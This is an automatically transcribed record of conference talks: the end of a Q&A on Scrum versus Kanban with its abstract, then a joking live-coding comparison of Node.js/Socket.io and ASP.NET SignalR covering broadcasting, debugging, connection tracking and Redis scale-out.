small team who are working on it, we're going to work very closely with the product owner, we're going to have sprints. But the key thing is if you can do Scrum but do the product increments, has serious product increments and not get into this Scrummerful situation where it becomes this long waterfall Scrum in the middle kind of situation. And I think sometimes when people are new to our job, you get people who are joining an organisation and maybe they said, oh yeah, I did Scrum in my last organisation but maybe they didn't really. And you can get people who are kind of passengers with the process and they don't really feel engaged with it and sometimes it helps to just bring it back to a much simpler, more rule based thing while people are learning. And then once they start to understand how things work, then increase the flexibility for changing stuff and move more towards a Kanban way of doing things. Now, I think I'm slightly early in the timings, I think maybe we've got five minutes left for questions, so have you got any questions? Any questions? Yes. Yes. So you can, well, so you can have a way that I've seen people do, they have like a ticket which represents the user story and then they have like a little tail of tickets which represent the tasks but they are small, you know, they use a mini post-it note things to have a few tasks. That, you have to really ask yourself why are you doing that and you wouldn't necessarily do as you do with sprint planning a session where you say, let's work out all the tasks for the sprint. You're much more, oh, we're about to start this item, let's figure out the task because then we can work out how to share that work out across the team. So you might have that as a triggered thing that you do as you take a ticket into starting to work on it and obviously you wouldn't do tasks for the ones that are small and kind of obvious. Does that make sense? Yes. Yes. Yes. And actually a classic thing people don't show, for instance, is testing tasks. So people kind of go, here's the development task and then we have a column for testing and we don't actually then unpack to say what are the testing tasks. So it very much comes down to the skills of the team and you have to think about when you're creating tickets, what are you really trying to represent, what's your communication, what communications that facilitate. Now, all I would say is that Kanban leaves it open as this is a toolset that you're using. So it's up to you whether that's useful for you to have a triggered event like every time we take a new ticket we do that unpacking into tasks or do we say use the task to represent the workflow so we have columns for them. But it's not something basically Kanban is much lighter and less processed than Scram. And Scram is pretty light. So it's even less. So one of the things that Kanban doesn't have, for example, is roles and it doesn't have any prescribed events. All it's saying is make things visible and limit the work in progress and then reflect on what you see. Try to look to improve your cycle times. And that then leaves it open to try all sorts of different experiments to try and improve your cycle times. Any other questions? Oh, sorry. The question was, and I might not word this question exactly now because it's been a few moments, but it was if you, so you were saying that there are user stories and sometimes the different sizes and sometimes you might want to do a task breakdown. So would you do that in Kanban or not? And you could if you wanted to, but you might not. And I think the other part was that sometimes some of these tasks when you break down an item are actually items in work, they're kind of activities in your workflow. So it might be that you don't have a task representing it because you now have a column representing it. So I don't know, was that a fair representation of your question? Okay. Any other questions? Yes. So I think it very much depends on how you establish them at this cadence of meetings. You clearly want this to be, you have some business people involved, but at the same time you want don't want everybody at all of those stand-up meetings necessarily, you may want key representative, key representatives, you might do something a bit like the product owner kind of pattern in Scrum, but you might not. One of the things you might decide to do is to have, you know, showcase events where you have everybody in the department goes to see those. So there's a bigger showcase. You might have a smaller group responsible for prioritization and it may be that two or three of those people are really sitting with the team actively being part of that system. I think anywhere where you have separation, where you have the people apart from the people, you know, so if what you don't really want is for the columns on the Kanban board to be like departments who don't, you know, who only talk through tickets. So, and then I'm just really remembering that I didn't repeat your question. So your question for the people who may not have known is what, how do you involve the business side in Kanban? Any other questions? Yes. How do you assure that the items have the same size? So you can't and it's through the team kind of going, and yes, you could imagine you've got some item. So the question is how can you assure that the items are the same size? If you get a very big item, it's going to block the pipeline up and it's going to have a long cycle time. It might be that that's a useful thing to release. And so you don't necessarily have to have things that are all the same. But it's just that if you are trying to make predictions about things based on your average cycle time, it helps to have things that are more or less the same size. But you don't, you're not trying to force things to be the same size. Yes. Well so if you had, just imagine, you had a very big item, it would just be in process for much longer. It's not, you're not exceeding your limit by putting a big thing in. It just slows things down. So it's just, that's going to start, people are going, you want to encourage people to reflect on that. It can vary. And it typically does vary. It's just that you don't want it to be very great. Yeah, you would want, in an ideal world, you're trying to break down the items to sort of similar size-ish things. But it may be that if you are really trying to release, you've come up with a minimal marketable feature that you think, right, this is the thing that we want to put live, it may make sense to do a bigger blob of work. There was, now I'm just thinking, my time is probably up. I don't know who was going to remind me about 10 minutes. Did you remind me about 10 minutes? I didn't see you. So I guess if there's any other questions then please come and see me afterwards. But otherwise, thank you.
|
Many teams who are already using Scrum would like to know what benefits they can get by moving to Kanban. Dropping the Sprint timebox can seem quite scary but on the other hand spending less time planning and estimating seems attractive to many developers. How do you know that you haven't thrown the baby out with the bathwater? Come to this talk to hear about what Kanban can bring your team and what practical steps you take to get started and keep going through the rough patches. We also take a look at potential pitfalls with Kanban and situations where you might want to move back to vanilla Scrum. I'll illustrate this talk with some stories from teams I've been coaching at BBC and Deutsche Bank.
|
10.5446/50987 (DOI)
|
Oh, good. Yes? Hello. Are we ready to start? We are ready to start. Hello, it is the cage match. We have Rob Connery. Yes. Happy with the heart of gold. Coming in from Hawaii, he's here to show us NodeJF and some smiles. And we have Damien over here. And Damien is Mr. Signalar. He is sort of mute. He lost his voice. We're not going to let that hold us back. We have some thoughts about that. And so we know you guys don't ask questions here in Norway, but we want you to make an exception and ask some questions, and we're going to have some fun for the next hour. And we're going to be talking about... It's not working. Oh, it's not working. This is an unfair match for you, doesn't it? It's not going to happen? No. I will be speaking for Damien. I can do that all day. I can just talk on yours, I guess. Yeah, you probably can. It's a Mac. It's got a repellent field. Oh, right, right, right. All right. Let's get going. We're going to be talking about NodeJF and Signalar. So first of all, I want to see what you guys are going to be working with. So Rob, let's show us, when you do some NodeJF, what are you going to develop with? Well, there's a number of choices that you have when you're working with Node. Sorry. No hitting below the belt, no excessive things. My preference is to just work with the console as you see. You're asking for it, man. I've got tricks. Yeah, so working with the console, as you see, is my typical favorite thing to do. And then I also like to use Sublime Text too. And it's right here. That's one of my favorite editors. I also like to work with Vim. I should also say if Hadi is here, that WebStorm is a great IDE that you can use. I tried to learn how to use it yesterday. I just didn't have enough time. I wanted to show it today, but it's got a debugger and telepond. All the stuff that you're probably used to in other IDEs. So that's what I use. All right, Damian, what do you got? A very bad voice. I have Windows 8, RC. I'm using Visual Studio 2012. RC. This voice is terrible. And I also have a command line. Mine's a little bit different to yours. I've got PowerShell running in console 2. And other than that, that's basically my tools. I'll use NuGet for package management, which we'll probably look at soon. All right, let's just jump right in and start with Hello World. Rob, can you, sure, print something out? Wow, that was terrible. Okay, so I've already kind of started things off a little bit because I don't want to go through all of the installations. To use anything with Node, use a thing called NPM, the Node Package Manager. And it'll download and install the modules into your projects. So right here I have a directory called cagematch. Inside there I have Node modules. Inside there I have a thing called Express. Express is going to give me a website. So to run it, just so you can see that I'm running it, you just type in Node and then app.js. It's going to run app.js, which is right here. So I'll hit go and it up comes the server. And then let's go to a new tab, localhost, not love shack Norway. That was a great, great video yesterday. Anyway, so here it is. It just pops up. There's our, there is Express. To install Socket.io, I'm going to use the same thing, same cage manager. I have a cage manager. Yeah, the cage manager. I'm the cage manager. Yeah, package manager. What is a cage manager? You don't answer that question. You do not answer that question. You're in the Navy when San Diego boy. I don't want to know about that. So npm install and socket, socket.io. And so what it's going to do is it's going to go up to the registry npm.js.org, grab Socket.io, it downloaded and installed it. Thank goodness for the internet. It works here. Hooray for NDC. And so inside here I now have a new module, Socket.io. It's in there. One of the cool things about the way Node works is when you install a package, it usually comes with examples and tests the source code and everything. So if you want to know how it works, you can just come on in here and take a look at a chat app and see how it's wired up. All right, so in the interest of time, I'm going to scream on ahead to wire up Socket.io. Let's see, we need to do var.io equals require. And this is the way you invoke a module. You just say require socket.io. And then you just have to tell it to listen to your app. And by the way, is Guillermo here? Anywhere? Then you can say whatever you want. Thank God. Yeah, so I found out just three days ago that the guy who actually wrote Socket.io is here at the conference. Yeah, so that's not terrifying at all. Step back a second. What's a socket? Why do we care? What's a socket? We're doing web stuff. So the idea behind Socket.io is it's real time, it's live, it's live connection. But what does that even mean? There's a number of ways that you can get your browser to lock onto your server and have this kind of live back and forth, this pull and this push. So Socket.io actually, it works with a technology called WebSockets. WebSockets is rather new and a lot of hosters and browsers and whatnot like IE9 and 10, right? I mean, a lot of other hosters, they don't support it. So what Socket.io does is kind of abstracts that all the way. So if you have WebSockets, you'll lock on and have a new socket session with your server. If your browser doesn't, then Socket.io will abstract that down to what they call Ajax long pulling, forever frames, blah, blah, blah, blah. So it goes all the way down to a browser IE5,5 plus. So this thing works with way old browsers and abstracts it away. So it keeps you with this virtual notion of persistent connection with your server and venting. Okay, you should be explaining this, not me, Mr. Boyce. I can't talk. So now I've got completely distracted. So one thing I do want to show is this is the socket.io website. It's just at socket.io. You can come over here and take a look at how to set up a server. And then you can just like what I just did is I'm using Express. So if we come down here and well the Express, the Express directions are somewhere down here. But anyway, what you can do is just take the code. Do you notice how I just skated right over that that I forgot how to do the code. On Connect and we can say socket.send.hello from server. So we have that. So I'm telling the Sockets when a connection comes in from the browser, send back a message. Sockets.send. And then if I go into views, index.jade and script source. Source and equals. Well, Rob's typing. I'm just going to say jade is awesome if you haven't used it. Just with. That's not fair because I've had to talk. Damian, were you writing a letter home to mother? Well, what's going on over here? So while you were busy. Yeah, you go ahead. You do it when I'm doing my demo. Doing whatever it is you do. I wrote a hello world app and signal. That's not fair. So it's just not fair. I used to get people obviously watched. I hope they went to mesmerize by Rob's sort of surface chic look. I downloaded signal. I knew get. I started an empty ASP.net application. I haven't actually used any ASP.net sort of isms so far. It's just an HTML page. So I got jQuery. I got signal. I knew get. I created a hub. I'm sorry. What? You guys, do I hear that or here? Nice. What was I doing? All you have is cheap pony tricks. Rob, this is going to be a very fun session. So I created a hub, which is kind of the unit of connection for signal. I'm in our high level API. This is the things that the clients connect to. In this case, I didn't need the clients to call anything on the hub. So there's no public methods. I just needed to be able to broadcast the client. So it's just an empty class that drives from hub. And then I just sort of did what you sort of never do in a web application, which is in AppStart, I fired up a thread and then in a while true loop, I just broadcast to that hub. I'm sleeping for a second in between. So I have a background thread running in my application, which is broadcasting hello world and the current UTC now date to the clients because we never use datetime.now in a web application, do we? So you're broadcasting, so you're sending down to the connected client, they're going to keep getting information back from the servers. Yeah, correct. So I mean, I can just sort of prove the point by opening up browser. Rob, look into something like that while Damien's talking. Me? Go on. Damien? Oh, what's that? Sorry. Are you done? I'm done. So that's hello world in signal. Done. So Rob did mention something about Socket.io being an abstraction over web sockets if it's not there. So that's exactly what's happening here as well. We can see if we look at Chrome on the left hand side, this connection down here where it says connect to signal up, if we look at the request, and I zoom in here, you'll see that it says the transport is server-cent events, which is a transport mechanism that all browsers other than IE supports, it's kind of an old-ish streaming web standard that never really caught on, but it's kind of useful for doing server push if the browser supports it. So signal up, we'll use that if it's there. Whereas IE, which doesn't support that, if we look at its network stack and figure out what it's using, so I'll just F5 here, and we can start capturing and do that again. Then we'll see down here that the transport in this case is something called Foreverframe, which is another old technique. It's been around for a while now for pushing data from the server to the client over an open HTTP connection. So we've negotiated the appropriate transport based on what browser we're using. Now I'm using the version of signal off from NuGet, which is 0.5, which doesn't include our web socket support, but the version in source, which will very soon release as 0.5.1, does indeed support web sockets if you're running on Windows 8 with IAS Express 8 or IAS 8. So the difference I'm guessing between all these sockets is probably going to be faster and better, but the fallbacks are going to work. They're just not going to perform as well. Right. We'll lose some features. Yeah, not really. Well, web sockets will do binary, but signal doesn't do binary. We haven't really had a need for it yet. Web sockets are so new anyway that there aren't a lot of use cases for it just yet. The truth is once you have an open connection, when you're doing server to client, even an open HTTP connection is essentially just a socket. So when you're pushing stuff over it, it really shouldn't be any slower than what a socket would be. That's not the same isn't true for going from client to server, because when you go client to server, you're just doing an AJAX post. So obviously there's a lot of overhead involved with that. But if your application is just doing like a normal user application where you're doing a post every second or so, you're not going to notice the difference. The only time you'll really start knowing it's a difference when you want to use sockets is for stuff that's truly real time like gaming, where you really need to have that full duplex bi-directional stuff. Gotcha. So Rob, Damian earlier, you know, one up the hello world and he started pushing down timestamps every little bit. I'm trying to do that and I'm getting blocked. For some reason I was thinking, set time out. Oh, set time out. So this is one thing about node that you should know is that if you do anything with the server and you change your code files straight away, you're going to have to restart it. So you can use it when you change a file, it bumps the server and restarts it for you, but it is a little bit annoying. So if I restart this, wait for a second. There we go. That's my HTML skills right there. Let's fix that, shall we? There we go. Much better. There we go. And that's supposed to be a timestamp, but it's a JSON timestamp. Everyone reads JSON time by now, right? Questions yet? Any questions? There's got to be some questions. Come on. No? Okay, let's talk about... I mean, I'd like to see a real lap. I'm wondering if we need to do anything more before we go on. We've got Hello World, which is nice, but I'm wondering about tracking something. Some user interaction of some sort, maybe. Yeah, exactly. How about we add a button that the user can click and when they click it, something happens in the other browser? Sounds good. That's like a step above, rather than let's sit for half an hour and watch this type. Yeah, sure. Okay. Alright. Somebody want to talk first while you go? You go first. Okay, so I'm going to go back to my hub and I'm going to add a method that the client side, in this case the browser, can invoke when this button gets clicked. So this could be a void returning method, which is what it's going to be now, because I'm just going to sort of send a fire and forget, or it could actually return something. Actually, let's do that just to prove it. So I'll just return a string from this method and I'll say do stuff. And again, that could take arguments as well. Be they primitives or complex arguments, we'll try and just deserialize those from JSON into the object using JSON.net. So as long as we can use JSON.net to shove it into the type, we'll do our best to do that. So let's, we'll take a message. What the hell? And so then once I have that message, I'm going to have to send that out to all the clients. So I'm going to use the client's dynamic property on the hub, which lets me invoke client side methods on the client side hub. So our hub technology is got a server client pair. We have a hub on the server and then we have a client hub, which is able to invoke methods on the server. And the server hub is able to invoke methods on the client hub. So I'm going to invoke clients.person. That hub is like a proxy then? It's kind of a combination of a proxy and an endpoint. Yeah, because it's a proxy in the sense that the client can call the server through it, but then it's an endpoint in that the server can call the client. So it's kind of a reverse proxy as well. Okay, and this has to return something as well. So we'll return a message. So now I'm going to come back to my UI and we'll add a button up here. So we'll say button ID equals do stuff. Do you need run out equal server there? No, but thank you for your insightful. It's missing view state. Yeah, it is. I chose not to use web forms today. I am the web forms program manager as well as. Oh, I know. Yeah. So you could maybe have a hub that increments view state as you go. Just keeps growing and growing. So don't laugh. No, see they just did. In a future version of SignalR we will have, I've already got a prototype of, who's ever used an update panel? Come on, be honest. Ha, suck it. So we all know that there's this concept. Who's enjoyed using an update panel? Yeah, it gets the job done. Who hates the drag and drop? It's everything after that. So we are, I do actually have a prototype of the control. You can drop it in an update panel that will invoke a server side oriented refresh of that update panel using SignalR. So that you could have the update panel refresh itself automatically when something in the server happens. Which is kind of cool if you've just got an existing app and you want to sort of add some real time update to it. Okay, we love web forms programmers. They're programmers too. So we want to do something. So now I'm going to come down here and after the start method is called, this is an interesting point. Common mistake people often make is they call start on the hub connection and they go ahead and start wiring up their client UI. And that's kind of bad. So I'll wire up the client UI and then I'll show you why. So let's find that button. So that was called do stuff. And when that's collect, I want to go ahead and on my hub I'm going to call, anyone remember what I called it? Do stuff. I should have known that. And I'm going to pass in something from the client. Okay. And that's going to return, ooh, that's going to return a value just so we can see that that. Return value. Okay. And I'll add that into here just so that we can prove. So I'm just going to call that same method because I'm lazy and pass in the value so we can see that it's actually getting that back from the server. Okay. So the problem with doing this is that start is asynchronous. Start is going to make an Ajax call and so what will happen is start will call will happen and then you'll wire up your click UI. And if someone happens to click the button before the connection is actually fully started, you'll get an error in the JavaScript because you can't send stuff over the connection before it's actually established. So what you have to do is start returns a deferred promise, a jQuery promise. So then you can chain that with a dot done and then pass in a function to that which will get executed when the connection is actually finished starting like so. Don't we love async programming, awesome stuff. So let me recompile that and see if this works. F5, F5. So now when I click me, okay, so I got an object that's really useful. Object, object. That's awesome. Let me go back. Let's do some debugging. This is a good segue into what would I do to debug this. So obviously what's coming back from the server isn't a string, which is what I thought it would be. So let's come into my script, which is this page here. This is the value I'm interested in. Start debugging. That's going to pop that out. Click that. I'm going to step over that now and my value is a value which contains a whole, it's a promise. Oh, I forgot. So when you invoke a server method, it itself is asynchronous. Of course. So you can't just get a return value from it. It's like an Ajax call. So what you have to do is rather than just assign the value to that, once again, you can send a call to the server. Once again, you can say dot done and treat this like an Ajax call like you would in Ajax, or you can pass a callback as a second parameter and we'll pass in the value into that callback. So I'll use dot done again because I like dot done. We'll do function. So the value is going to go into the function. And then once that's finished, we will pass. There it is. So now you can see where the wonderful world of asynchronous programming really comes to light. We have this beautiful nested call hierarchy. F5. Okay. Awesome. There we go. So there's my message. Hey, hey, hey. You can see that coming in now on both sides. Oh, I'm sorry. You are an old man, aren't you? You had that one, Stahls. Ready to go to mute. No, you just walked into it. Sorry, did I interrupt you? No, no, no, I'm done. Oh, cool. And you? Yes. Awesome. I didn't use the hub that Damian did. In fact, I didn't even explain the client code. So let's step through that real fast. I'm using jQuery, same as Damian, and I'm trying to do the same exact JavaScript that Damian is. And I think this is actually an important point aside from the Socket.io stuff. Aside from Socket.mit, et cetera, I mean, the client side code is actually fairly trivial. You're just triggering events, responding to events. And if you do any client side coding with Backbone or anything, then hopefully your mind juices are starting to flow. Like, wow, I can listen to a model and then I can fire something on the server and data gets sent over. So what I originally had done is just listen to the connect event from the server saying onConnection, da, da, da. So to avoid what Damian was talking about, about an asynchronous crash, you'd want to wait for the socket on connection to actually be able to do anything. So you might want to have a flag in here before you emit this event. So what I did here is with the client library that I hooked up, because Socket.io gives you a client library. Using the client library, I just emitted an event. And I just said client calling. And then I said this is the client calling, of course. And then I was able to also pass a function from my client up to this server. So the server could invoke that function back on the client. Sounds kind of wacky, but that's what happened. And so I'm just updating my status right here. And on the server, I simply told the socket to listen when the client's calling. I'm going to be receiving some data and a function. I can take that data and do whatever I want with it. And then I'm just invoking the function right here. Hello, client. This is server. A little bit of round-tip craziness, but it's how it works. Now, to pick up on Damian's point about hubs, which I think are very important, I had to chain events, which is kind of mind-bending a little bit. I had to call socket emit and then socket on as a listener on the server, socket emit on the client. With a hub, it makes it a little bit easier because you can just invoke an event. That gets abstracted. You just say, well, I'm going to invoke something on the server. And so for that, I didn't have time to put together a demo and I apologize for that. But let's see, we have nowJS somewhere. NowJS, nowJS, nowJS, right there. So nowJS allows you to do sort of the same thing. And it works, doesn't work with SignalR, too? Does nowJS work with SignalR? You guys have hubs built in? We have hubs built in. So full disclosure, we got a lot of our inspiration from nowJS and socket.io. So that's why it looks very similar. Yeah. So yeah, the only thing I missed was that people might have seen me fix while Rob was talking is I wired up that extra. So I was calling person did stuff, but I hadn't added that function on the client side. So when I click the button, you'll know what I get is when I click the button, I get an echo back to the client that clicked it of the hey hey, because that's what the server's returning to the person who clicked it. And then a broadcast, this is the client speaking. So on the left-hand side, as I click, you'll see hey hey is appearing, but it's not appearing on the right-hand side. Because one's an echo and one's a broadcast. Oh, right. I didn't do the multi-browser stuff. So let's do the multi-browser. Well, first, before we get into multi-browser, Damian, maybe you want to start looking at multi-browser, like sending to more than one browser, you know, multi. But... I know exactly what you mean, John. Did you get much sleep last night? I actually did. I'm all completely on Norway time ready to fly back tomorrow. So wait, multi is in... Mold than one? More than one. Like what I have here? Pick a number like 400. Okay. Sending different things to different browsers. Can we do that? Okay. I have a question for you. Damian was going through and doing some stuff with debugging. Yep. How do you debug Node.js? Response is not right. Alert. Yes. You do alert because it's JavaScript. When you do alert on the server... Alert on the server, it pops up a message by all the parts to the mult... So all the parts to the mult. And that's the demo that's going to do right now. No, there's a couple of ways of doing it. I'm going to show you the hard way first. So if I want to debug, which everybody does, you can do nbm install node inspector. And thank you to Rob Ashton for showing me this yesterday. And so this is simply going to drop in a module. And let's take a look at that. Node inspector is now here. My Node module has been... By the way, I just want to explain to you, notice that modules contain modules. And if I pop this open, there could be more modules in there. That's one of the... Yeah, there's one. That's one of the weird and fun and fantastic things about Node that make it really fun to work with. In the Rails world, I'm sure anybody who's worked with Rails or Ruby, Gem collisions and craziness, trying to figure out versions of stuff, even.NET with GAC stuff. I didn't mean that while I'm sorry. Watch. So anyway, it's really a handy thing. So what we can do is, let's see, go into Node inspector and actually, I am going to go to GitHub to the Node inspector. Right. So you're going to run your app in debug, which is Node debug. And then app.js. And so now I'm running a debug mode. Nothing crazy about that. But then I'm going to go to a different browser here. Or a different... Yep, that's what I want. And then you can simply put in Node inspector, this command right here, just invoke it in the same directory. Was that you? Maybe Damian had something playing really quietly, just to nerve you a little bit. I'm sure. So now I've got two processes running. I've got my app running in one window, this one, and I've got a Node inspector running in the other. And it's actually kicked up a brand new thing for us to see. And so if I go over here, put that in. That is a little website deal. All my Node scripts and modules and everything here. And whoo. That wasn't me. So I can actually come over here. It's me. I can come over here and I can set a break point if I want to. And I can... You are asking for... I was so nice to you when you were doing it. I seriously... Because you needed help. And I felt bad for you. Because you were floundering. I hit click and if I come over to my debug window, it's fired. And so I can hover over this stuff and I can see the data coming in. No, I guess it's in fire yet. But I can hover over it and I can see all the stuff. I can browse it, take a look at it. It's very helpful. All right. That's the hard way, believe it or not. The easy way is, Haughty, this one's for you, my friend. Webstorm. So Webstorm is the IDE I told you about before. Without going into too much detail, I can start a project. I can tell it I want a Node.js Express app. Or I can do Twitter, Bootstrap, blah, blah, blah. So I can pick my view engine. I can tell it what CSS engine I want. I'm going to leave this just like this. I'm going to say, okay, it's going to start up this thing. It's actually going out doing NPM install Express. It's installing all my goodies for me. But I'm going to need to run this thing. And then here's my library. And what I can do is come in here and I can edit a configuration. I can tell it that I want to run this file. When the app starts, I hit OK. So I can come in here. The pink is not a good idea. Where are you, Haughty? Anyway, so I can just set a breakpoint right there and hit debug. Up it comes. Breakpoint hits. So that's the easy way. Cool. I got one last question before we get back. Actually, I completely forgot my question. I'm still ahead of all you guys. You're not asking enough. Rob, can you start in on, I want session management. So for instance, I've got two people on the thing. And if I click the button, only I see the result. But the other people that are connected don't see that result. Something like that. Is that what you did, Damien? Yeah. So I'm sort of expanding on that right now. Does that make sense? So you mean the reverse of that? It's like you click a thing. Fine. Either way. Yeah. Broadcast, I don't want to see my own events. Something like that. OK. What do you have? Yeah. So I'm just sort of refactoring my code a bit and adding a, I'm showing off another feature. So I've added connection tracking. So one of the things that these libraries will generally give you is the intrinsics to track when a person connects and when they disconnect. So in the hub world and SignalR, you implement these two interfaces. I connected and I disconnect. So you have methods that you would expect to have on interfaces that are called those things, connect, reconnect, disconnect. And then I'm just using a really ghetto way of tracking the people when they connect and disconnect. I have a static concurrent dictionary called connections of stringed objects. So the connection ID is always a string and object is, I don't care because I'm just using the concurrent dictionary as a way to store stuff. Concurrent is great because it means it's thread safe. I don't have to worry about locking it because it's a static collection in a web application. Because multiple people will be doing stuff on at the same time. So what I'm doing is this when connectors run, I am adding that connection ID to the concurrent dictionary and then I am broadcasting out a new invocation saying here is the current number of clients that are currently connected. So when it gets reconnected, I do the same. When it gets disconnected, I do the same. So the other thing I did was up in do stuff, I showed you using clients before which is how you broadcast an invocation to everyone who's listening. We also have another dynamic property called caller which lets you do the same thing but just to the person who invoked this method. So over here you can see caller.hello world, this is for the caller only. So assuming I am, and then what I've done on the client side, I know this is a lot, I was starting to add a whole bunch of different methods to my hub. So rather than using the syntax of hub.blah equals this function, hub.blah equals that function, I prefer to use jQuery's extend method which lets me extend my client side hub with just this object literal which is all the functions that sort of contain my client side methods. And so I won't implement update connection count just yet because I don't really need that just now. So let's go and have a look at what this does. So now if I click me, you can see I got this is the client speaking which was the message the client sent to the server and it broadcast out to everyone so the left hand side got it as well. And then this was this is for the caller only which was the server calling back via the caller.hello world. So this is for the caller only. And then this is the server speaking which was the value returned from that remote procedure call. So you can see that there are different ways that you can sort of get messages to the client and to all clients using hubs. Great. Cool. I'm going to go ahead and add some UI while you're speaking to show the connection count. Okay. I've got another, while you're doing that, my question here is Rob is typing JavaScript server and client. Right. So Rob is doing static C sharp and JavaScript. That's some dynamic C sharp. Dynamic C sharp. Okay. Okay. You're all right now. So. Man, I didn't mess with you once. You Aussie. So what does Rob have that Damian misses out on by doing JavaScript client and server? Can you pass whole functions or stuff from the client to the server? Is it easier to talk Jason back and forth? Well, in the demo that hopefully we'll get to when you're working, when you're working in JavaScript on the client and then you're working with it on the server and then if you use Mongo and you're working with it in Mongo, your head is in one place and it just, it's helpful, but it's also JavaScript. Okay. That's enough. What does that mean? It's when I hit like two keys at the same time or something. Sorry, keyboard. That's obviously too much for you to have. Can that JS make that deep in noise too? So yeah. Anyway. Okay. One thing I should mention really quickly before I get into the multi demo here. When you're using Express, you have a server file. For some reason they call it app.js, which is out of compliance with Heroku and didn't you, did I do that? That was me. I thought you went, that's weird. I'll put it back in. So this is a server configuration stuff all in here. So that's the best way to think of this. This isn't how you run your app. But if you want to use CoffeeScript, which a lot of people do, you can just say something like var cs equals require coffee script. As long as it's installed and then if you don't want to write JavaScript on the server, you don't have to. The whole thing just works with CoffeeScript straight up, which is kind of nice if you like CoffeeScript. So what were you talking about? Did you ask me a question? That was it. Well, I wanted to know if you know, if you can pass things back to the work client server and all that. Yeah, you certainly can. I passed the function in right here at the last socket emit. I passed the function in, which I'm actually going to delete right now. And the function was able to be fired back on the client. So there is some of that using eval and so on, which is evil. But anyway, what I've done here, I've changed things around so I can broadcast. And to do that with Socket.io, you just put broadcast in front of anything that you want to do, any operation. So send just uses a default transport mechanism, and it fires an event on the client called message. So in the very beginning, the first demo I showed, I responded to that event. I said, on message, take the data that comes in and then pop it using jQuery into the status div down here. In fact, let me make that an H1 so we can see it. So at this one, I don't want to just send the message straight out. I want to broadcast it to the other browsers. So if you use the word broadcast, it automatically knows, don't send it back to who just called me, just broadcast it to every other connection except for this one. And then I'm going to do socket.send message sent, and that should go straight back to client who called only. If that makes any sense at all. Go ahead, Wheeling, this will work. And so I go here. Okay, you ready to rejoice in my failures? Oh, and I don't even have another browser open. Nice demo, Rob. Okay, so I'll click here, message sent. This is the client calling. So that was the message that got broadcast by my code over here. Client calling, this is the client calling. So you can see these two are different. If I click that, this one's message sent, and this one says this is the client calling. So that's how you work with broadcasting. Okay, nice. So while that was happening, I just added connection count. Using that code I showed you before, I now have some UI that's actually being updated. And I have two browsers, so it's two at the moment. If I hit F5, you'll see it goes up to three. If I hit F5 on the right, it goes up to four. So what happens there is when you hit F5, the connection that you had open obviously goes away because the connections don't persist across page navigations. They only live as long as the page is open. And so, and then after some period of time, the web server will tell us that that connection is no longer valid. And we will clean that up, get rid of it, and the connection count will go down because we'll fire the disconnect message on your code. And so that count will go down. You probably saw that go down, it went up to six or eight before or something. Now there it goes, it's gone down to two after about 20 seconds. So we have two types of disconnect in SignalR. We're still working on these intrinsics because it's something that's really, really difficult to get right, especially in sort of web farm scenarios. But there's a graceful disconnect where we'll attempt to actually send a disconnect message to the server. The version in NuGet doesn't have that capability, which is why that took 20 seconds. Whereas the version in source right now listens to Window Unload. And if the browser will let us, we'll send a packet to the server saying this connection is now gone. And so the count will go down immediately. So but eventually we have this background process that just sits there and cleans up connections. And that's a good event to listen to. So you can do a pop up that says, we noticed you're leaving our website and would you like to subscribe to our website? Right, do you want to fill in this survey and do we end a million dollars? Okay. Maybe. So Damien's talking about client disconnection. On Node, can you do the same? Can I track disconnect? Yeah. So the socket will do is if you get disconnected, it'll what? Socket, yes, not Node. Sorry, go ahead. That's okay. Socket I'll actually buffer what you're doing. And this is actually a good discussion to have too. It'll buffer the messages and it'll wait for the client to reconnect. And I don't know how long the buffer queue goes, but it'll just wait, wait, wait, wait, wait, and then you come. Buffer in. Oh, great. Thank you. Another thing a lot of people ask is, you know, notice single threaded and you know, everybody says. Rob likes to buffer. Node can scale a lot. Oh man. Okay, fine. Save in the site. Did you just say scale? Node, everyone says, no, everyone says Node can scale, Node can scale. Infinitely. Unblocking. Yes, exactly. And that's kind of one of the neat features about it. Hopefully we'll get to a load test demo. Fibonacci.js. Exactly. But if you only have one machine and one process, if that process goes down, everything dies. So a lot of people say, well, what happens with your, you know, scalable groovy socket IO app? And one thing you can do is I'm just using the default memory store. So when a message comes in, it's popped into memory and then broadcasts back out. You can use Redis for that and you can have Redis on a third machine. And your scaling plan is just whatever web servers you want. Socket IO on each web server is going to then talk to the Redis machine and the Redis machine using PubSub and Redis is going to pop it out to all the other things. So it's just kind of handy. Let's do that. Yeah, let's do. So I'm going to start Redis because that sounded really cool and I want to get in on the party. So here's Redis running. This is Redis for Windows, which MS Open Tech. Have you all heard of MS Open Tech? Okay, let me evangelize for a moment. MS Open Tech is a wholly owned subsidiary of Microsoft that was recently announced about three weeks ago or something. That does nothing but open source software. So it's the way that Microsoft contributes to open source. What is Microsoft? I can't compete with your hipster Mac voice effects. Start with my own voice, of course. Rocket, damn you. And the first thing that they announced was a port of Redis to Windows. It's available on GitHub. All I literally just went to GitHub, cloned the repository. You can see that in my console window here. Open it in Visual Studio, compiled it, C++, went to the command line and hit the start process Redis server.exe. And that's all I've done. I haven't configured it or anything. So it's running on whatever port it said it was running on. So I'm running Windows 8, 3, something, 6379. 6379. Yep. So now what I'm going to do is start two web servers. Because if we want to show scale, it helps if we have more than one server. So I've got my little start farm script. So this is two instances of IS Express. Who's used IS Express? Okay. When using SignalR, if you're not running a server OS, so I'm running Windows 8 desktop, not server. So you have to, have to, have to use IS Express because IS on Windows 8 desktop has a concurrent connection limit of 10. And as you saw, when you hit F5 in your browser, the connection stays around for a while. So if you're using SignalR and you're making persistent connections, you'll hit F5 three times and then everything stops working, which isn't a lot of fun. So make sure you use IS Express. Also it's awesome. So you may as well just use it. You can fire it up from the command line like I'm doing here. To say to IS Express, go and start hosting this folder, which is exactly what I've done here. I've got two instances of IS Express, different ports, same folder. So now if I go to my browsers and I go to, I think it's local host, I've got one on 8090. I think the demo is move shape. Okay. And then I've got one here, which is on 8091 move shape. Now this won't work because I know at the moment I haven't configured this application to use Redis. So let me open up the application and show you just how easy it is to actually configure this to use Redis. Does this seem practiced to anyone? Just out of curiosity? I may or may not have shown this yesterday to some people in the crowd. Oh, really? Yeah. Go on. That's okay. Well, I'm sure it's going to be the same for just as easy on socket.io, right? Yeah. Right? I've done it. Okay, so I'm opening up that solution. I'm just going to go into my startup and comment out this assembly attribute, which is what's kicking off the Redis sort of wire up. F5. F5 that again, that's a known bug. It's a really pretty UI change you did there, buddy. I like it. Let's try that again. It's a lovely shade of yellow. Can you get a yellow screen of death on? Yes. We should have updated the yellow screen of death for four or five. I think it just swallows the error. There we go. If we open up, if I get my console's opening, there's my one web server down here, one web server there, Redis in the middle. Now I'm going to hide them. Let me push this up and hide that. 